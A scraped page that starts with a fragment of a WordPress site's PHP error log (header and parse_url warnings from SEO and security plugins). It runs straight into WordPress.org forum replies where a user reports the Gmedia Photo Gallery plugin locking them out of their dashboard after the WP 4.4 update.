/home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [28-Jun-2015 08:09:10] PHP Warning: parse_url(/http://www.http://wordpress.org/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [28-Jun-2015 08:09:11] PHP Warning: parse_url(/http:/www.http:/wordpress.org/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [28-Jun-2015 08:09:41] PHP Warning: parse_url(/http://www.http://magento.com/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [28-Jun-2015 08:09:48] PHP Warning: parse_url(/http:/www.http:/magento.com/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [28-Jun-2015 15:08:36] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wForum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityLike @jnashhawkins wrote above, exactly same thing happened to me.
Any solution.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI try everything, first I fully remove plugin then disable all plugins and reinstall plugin. When I do that I don’t have anymore access to my site I mean dashboard etc. Then I through Cpanel rename Gmedia plugin in some other name then I have access to my dashboard and then I must delete plugin.
I didn’t find where is problem, any tips.
RegardsForum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI must be honest and tell that basically this is good plugin and I love it, but this last error make my life miserable, so please Rutts fix this as soon as possible if you can of course.